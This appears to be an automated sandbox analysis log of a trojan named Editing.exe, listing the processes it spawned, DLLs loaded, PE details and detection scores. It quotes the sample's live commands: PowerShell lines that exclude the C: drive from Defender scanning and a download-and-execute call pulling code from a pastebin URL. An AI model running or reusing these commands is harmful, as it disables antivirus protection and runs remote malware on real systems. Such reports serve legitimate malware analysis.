Source: Editing.exe, 00000000.00000002.3214432901.00000284CFD41000.00000020.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameSystem.Security.Cryptography.dll@ vs Editing.exe
Source: Editing.exe, 00000000.00000002.3212183576.00000284CC9D0000.00000004.10000000.00040000.00000000.sdmp | Binary or memory string: OriginalFilenameSystem.Diagnostics.Process.dll@ vs Editing.exe
Source: Editing.exe, 00000000.00000002.3215900196.00000284D08A1000.00000020.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameSystem.Reflection.Primitives.dll@ vs Editing.exe
Source: Editing.exe, 00000000.00000002.3214933418.00000284CFF70000.00000004.10000000.00040000.00000000.sdmp | Binary or memory string: OriginalFilenameSystem.Private.DataContractSerialization.dll@ vs Editing.exe
Source: Editing.exe, 00000000.00000002.3212225709.00000284CCA01000.00000020.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameSystem.Diagnostics.Process.dll@ vs Editing.exe
Source: Editing.exe, 00000000.00000002.3214325112.00000284CFC60000.00000004.10000000.00040000.00000000.sdmp | Binary or memory string: OriginalFilenameSystem.Collections.Concurrent.dll@ vs Editing.exe
Source: classification engine | Classification label: mal100.troj.expl.evad.winEXE@14/17@4/5
Source: C:\Users\user\Desktop\ Editing.exe | File created: C:\Users\user\AppData\Roaming\notification_sent.flag
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Mutant created: NULL
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6108:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2104:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4184:120:WilError_03
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_t2fdftab.pml.ps1
Source: C:\Users\user\Desktop\ Editing.exe | Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: Editing.exe | ReversingLabs: Detection: 51%
Source: Editing.exe | Virustotal: Detection: 50%
Source: Editing.exe | String found in binary or memory: overflow:hidden;img src="http://addEventListenerresponsible for s.js"></script>
Source: Editing.exe | String found in binary or memory: Morph - Structs/AddrExp
Source: Editing.exe | String found in binary or memory: @0x%x with loopPre-importprejittail.call and not BBINSTRExpand patchpointsPost-importImportationIndirect call transformProfile incorporationMorph - InitProfile instrumentation prepProfile instrumentationAllocate ObjectsRemove empty tryMorph - InliningMorph - Add internal blocksClone finallyUpdate finally target flagsRemove empty finallyMerge callfinally chainsEarly livenessPhysical promotionUpdate flow graph early passMorph - Structs/AddrExpMorph - ByRefsMorph - Promote StructsForward SubstitutionIdentify candidates for implicit byref copy omissionGS CookieCompute edge weights (1, false)Morph - GlobalMorph - FinishMerge throw blocksInvert loopsCreate EH funcletsTail mergeOptimize layoutCompute blocks reachabilityPost-morph tail mergeOptimize control flowFind loopsClone loopsSet block weightsRedundant zero InitsMorph array opsHoist loop codeUnroll loopsClear loop infoFind oper orderSet block orderMark local varsOptimize boolsSSA: Doms1SSA: livenessBuild SSA representationSSA: topological sortSSA: renameEarly Value PropagationSSA: DFSSA: insert phisOptimize Valnum CSEsVN based copy propDo value numberingOptimize index checksAssertion propIf conversionVN based intrinsic expansionRedundant branch optsCompute edge weights (2, false)Stress gtSplitTreeVN-based dead store removalUpdate flow graph opt passExpand TLS accessInsert GC PollsExpand runtime lookupsExpand static initDo 'simple' loweringLocal var livenessDetermine first cold blockRationalize IRGlobal local var livenessLowering decompositionLocal var liveness initPer block local var livenessLinear scan register allocLSRA build intervalsLowering nodeinfoCalculate stack level slotsPlace 'align' instructionsGenerate codeLSRA allocateLSRA resolvePost-EmitEmit codeEmit GC+EH tablesProcessor does not have a high-frequency timer.
Source: Editing.exe | String found in binary or memory: GC initialization failed with error 0x%08XVirtualAlloc2kernelbase.dllMapViewOfFile3bad array new lengthstring too longUsing internal fxrApplication root path is empty. This shouldn't happenUsing internal hostpolicy--depsfilePath containing probing policy and assemblies to probe for.<path>--additionalprobingpath--fx-versionPath to <application>.runtimeconfig.json file.--runtimeconfigPath to <application>.deps.json file.<value>--roll-forwardVersion of the installed Shared Framework to use to run the application.<version>--roll-forward-on-no-candidate-fxPath to additional deps.json file.--additional-depsRoll forward to framework version (LatestPatch, Minor, LatestMinor, Major, LatestMajor, Disable)Parsed known arg %s = %ssdk<obsolete><n>Application '%s' is not a managed executable.Using the provided arguments to determine the application to execute. %s %-*s %sFailed to parse supported options or their values:--- Executing in split/FX mode...The application to execute does not exist: '%s'dotnet exec needs a managed .dll or .exe extension. The application specified was '%s'Application '%s' does not exist.staticexec--- Executing in muxer mode...--- Executing in a native executable mode...
Source: Editing.exe | String found in binary or memory: %s --list-runtimes Display the installed runtimeshost-options: The path to an application .dll file to execute.path-to-application: --info Display .NET information. -h|--help Displays this help.Common Options: --list-sdks Display the installed SDKsinvalid hash bucket countunordered_map/set too longinvalid string positionvector too longInvalid startup info: host_path, dotnet_root, and app_path should not be null.A fatal error occurred while processing application bundlehostfxr_main_bundle_startupinfo--- Invoked %s [version: %s]hostfxr_main_startupinfoget-native-search-directories--list-runtimes--list-sdksUsing dotnet root path [%s]/?-?--help-hdotnet.dll The command could not be loaded, possibly because:
Source: Editing.exe | String found in binary or memory: https://aka.ms/dotnet/app-launch-failed
Source: unknown | Process created: C:\Users\user\Desktop\ Editing.exe "C:\Users\user\Desktop\ Editing.exe"
Source: C:\Users\user\Desktop\ Editing.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Add-MpPreference -ExclusionPath 'C:'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\ Editing.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -ExecutionPolicy Bypass -Command "iex (iwr "https://pastebin.com/raw/WHKzW2nr" -UseBasicParsing).Content"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\fri53hgi\fri53hgi.cmdline"
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESD5A5.tmp" "c:\Users\user\AppData\Local\Temp\fri53hgi\CSCED018B8952BA4EF4818E245D55BA92D6.TMP"
Source: C:\Users\user\Desktop\ Editing.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Add-MpPreference -ExclusionPath 'C:'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\ Editing.exe | Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\ Editing.exe | Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\ Editing.exe | Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\ Editing.exe | Section loaded: wldp.dll
Source: C:\Users\user\Desktop\ Editing.exe | Section loaded: secur32.dll
Source: C:\Users\user\Desktop\ Editing.exe | Section loaded: sspicli.dll
Source: C:\Users\user\Desktop\ Editing.exe | Section loaded: icu.dll
Source: C:\Users\user\Desktop\ Editing.exe | Section loaded: iphlpapi.dll
Source: C:\Users\user\Desktop\ Editing.exe | Section loaded: dnsapi.dll
Source: C:\Users\user\Desktop\ Editing.exe | Section loaded: dhcpcsvc6.dll
Source: C:\Users\user\Desktop\ Editing.exe | Section loaded: dhcpcsvc.dll
Source: C:\Users\user\Desktop\ Editing.exe | Section loaded: winnsi.dll
Source: C:\Users\user\Desktop\ Editing.exe | Section loaded: winhttp.dll
Source: C:\Users\user\Desktop\ Editing.exe | Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\Desktop\ Editing.exe | Section loaded: mswsock.dll
Source: C:\Users\user\Desktop\ Editing.exe | Section loaded: wshunix.dll
Source: C:\Users\user\Desktop\ Editing.exe | Section loaded: winrnr.dll
Source: C:\Users\user\Desktop\ Editing.exe | Section loaded: rasadhlp.dll
Source: C:\Users\user\Desktop\ Editing.exe | Section loaded: nlaapi.dll
Source: C:\Users\user\Desktop\ Editing.exe | Section loaded: wshbth.dll
Source: C:\Users\user\Desktop\ Editing.exe | Section loaded: devobj.dll
Source: C:\Users\user\Desktop\ Editing.exe | Section loaded: pnrpnsp.dll
Source: C:\Users\user\Desktop\ Editing.exe | Section loaded: napinsp.dll
Source: C:\Users\user\Desktop\ Editing.exe | Section loaded: fwpuclnt.dll
Source: C:\Users\user\Desktop\ Editing.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\Desktop\ Editing.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\Desktop\ Editing.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\Desktop\ Editing.exe | Section loaded: wbemcomn.dll
Source: C:\Users\user\Desktop\ Editing.exe | Section loaded: amsi.dll
Source: C:\Users\user\Desktop\ Editing.exe | Section loaded: userenv.dll
Source: C:\Users\user\Desktop\ Editing.exe | Section loaded: profapi.dll
Source: C:\Users\user\Desktop\ Editing.exe | Section loaded: schannel.dll
Source: C:\Users\user\Desktop\ Editing.exe | Section loaded: mskeyprotect.dll
Source: C:\Users\user\Desktop\ Editing.exe | Section loaded: ntasn1.dll
Source: C:\Users\user\Desktop\ Editing.exe | Section loaded: ncrypt.dll
Source: C:\Users\user\Desktop\ Editing.exe | Section loaded: ncryptsslp.dll
Source: C:\Users\user\Desktop\ Editing.exe | Section loaded: msasn1.dll
Source: C:\Users\user\Desktop\ Editing.exe | Section loaded: cryptsp.dll
Source: C:\Users\user\Desktop\ Editing.exe | Section loaded: rsaenh.dll
Source: C:\Users\user\Desktop\ Editing.exe | Section loaded: cryptbase.dll
Source: C:\Users\user\Desktop\ Editing.exe | Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wininet.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: miutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wmidcom.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wbemcomn.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: iphlpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dnsapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dhcpcsvc6.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dhcpcsvc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: winnsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rasapi32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rasman.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rtutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mswsock.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: winhttp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rasadhlp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: fwpuclnt.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: schannel.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mskeyprotect.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ntasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ncrypt.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ncryptsslp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ntmarta.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Section loaded: version.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Section loaded: mscoree.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Section loaded: cryptsp.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Section loaded: rsaenh.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Section loaded: cryptbase.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe | Section loaded: cryptsp.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe | Section loaded: rsaenh.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe | Section loaded: cryptbase.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wininet.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: miutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wmidcom.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wbemcomn.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
Source: Editing.exe | Static PE information: Virtual size of .text is bigger than: 0x100000
Source: Editing.exe | Static PE information: Image base 0x140000000 > 0x60000000
Source: Editing.exe | Static file information: File size 38550125 > 1048576
Source: Editing.exe | Static PE information: Raw size of .text is bigger than: 0x100000 < 0x61a800
Source: Editing.exe | Static PE information: Raw size of .rdata is bigger than: 0x100000 < 0x17c600
Source: Editing.exe | Static PE information: Raw size of .rsrc is bigger than: 0x100000 < 0x157c00
Source: Editing.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: Editing.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: Editing.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: Editing.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: Editing.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: Editing.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
Source: Editing.exe | Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
Source: Editing.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Threading.Thread\Release\net8.0\System.Threading.Thread.pdb source: Editing.exe, 00000000.00000002.3216088459.00000284D09B0000.00000004.10000000.00040000.00000000.sdmp, Editing.exe, 00000000.00000002.3216068311.00000284D09A1000.00000020.00001000.00020000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Xml.ReaderWriter\Release\net8.0\System.Xml.ReaderWriter.pdbSHA256I source: Editing.exe, 00000000.00000002.3213973895.00000284CFAF1000.00000020.00001000.00020000.00000000.sdmp, Editing.exe, 00000000.00000002.3214871433.00000284CFF50000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: System.Net.Sockets.ni.pdb source: Editing.exe, 00000000.00000002.3214572685.00000284CFE30000.00000004.10000000.00040000.00000000.sdmp, Editing.exe, 00000000.00000002.3214620254.00000284CFE71000.00000020.00001000.00020000.00000000.sdmp
Source: Binary string: System.Collections.Concurrent.ni.pdb source: Editing.exe, 00000000.00000002.3214300596.00000284CFC41000.00000020.00001000.00020000.00000000.sdmp, Editing.exe, 00000000.00000002.3214325112.00000284CFC60000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Private.Xml\Release\net8.0-windows\System.Private.Xml.pdb source: Editing.exe, 00000000.00000002.3215619881.00000284D0541000.00000020.00001000.00020000.00000000.sdmp, Editing.exe, 00000000.00000002.3215366959.00000284D0240000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.IO.FileSystem.DriveInfo\Release\net8.0-windows\System.IO.FileSystem.DriveInfo.pdb source: Editing.exe, 00000000.00000002.3212455724.00000284CCAC1000.00000020.00001000.00020000.00000000.sdmp, Editing.exe, 00000000.00000002.3212473659.00000284CCAD0000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: System.IO.FileSystem.DriveInfo.ni.pdb source: Editing.exe, 00000000.00000002.3212455724.00000284CCAC1000.00000020.00001000.00020000.00000000.sdmp, Editing.exe, 00000000.00000002.3212473659.00000284CCAD0000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: System.Diagnostics.Process.ni.pdb source: Editing.exe, 00000000.00000002.3212183576.00000284CC9D0000.00000004.10000000.00040000.00000000.sdmp, Editing.exe, 00000000.00000002.3212225709.00000284CCA01000.00000020.00001000.00020000.00000000.sdmp
Source: Binary string: System.ComponentModel.Primitives.ni.pdb source: Editing.exe, 00000000.00000002.3212165209.00000284CC9C1000.00000020.00001000.00020000.00000000.sdmp, Editing.exe, 00000000.00000002.3212254148.00000284CCA30000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: System.Private.Uri.ni.pdb source: Editing.exe, 00000000.00000002.3214257265.00000284CFC20000.00000004.10000000.00040000.00000000.sdmp, Editing.exe, 00000000.00000002.3214057906.00000284CFB01000.00000020.00001000.00020000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Diagnostics.DiagnosticSource\Release\net8.0\System.Diagnostics.DiagnosticSource.pdbSHA256P?> source: Editing.exe, 00000000.00000002.3214089010.00000284CFB20000.00000004.10000000.00040000.00000000.sdmp, Editing.exe, 00000000.00000002.3214140885.00000284CFB51000.00000020.00001000.00020000.00000000.sdmp
Source: Binary string: Microsoft.Win32.Registry.ni.pdb source: Editing.exe, 00000000.00000002.3215940910.00000284D08D0000.00000004.10000000.00040000.00000000.sdmp, Editing.exe, 00000000.00000002.3211154010.0000024437CD1000.00000020.00001000.00020000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Security.Cryptography\Release\net8.0-windows\System.Security.Cryptography.pdb source: Editing.exe, 00000000.00000002.3214347772.00000284CFC80000.00000004.10000000.00040000.00000000.sdmp, Editing.exe, 00000000.00000002.3214432901.00000284CFD41000.00000020.00001000.00020000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Collections\Release\net8.0\System.Collections.pdb source: Editing.exe, 00000000.00000002.3214846387.00000284CFF31000.00000020.00001000.00020000.00000000.sdmp, Editing.exe, 00000000.00000002.3214801607.00000284CFF10000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: :C:\Users\user\AppData\Local\Temp\fri53hgi\fri53hgi.pdbhP source: powershell.exe, 00000004.00000002.2191077266.0000020A63B94000.00000004.00000800.00020000.00000000.sdmp
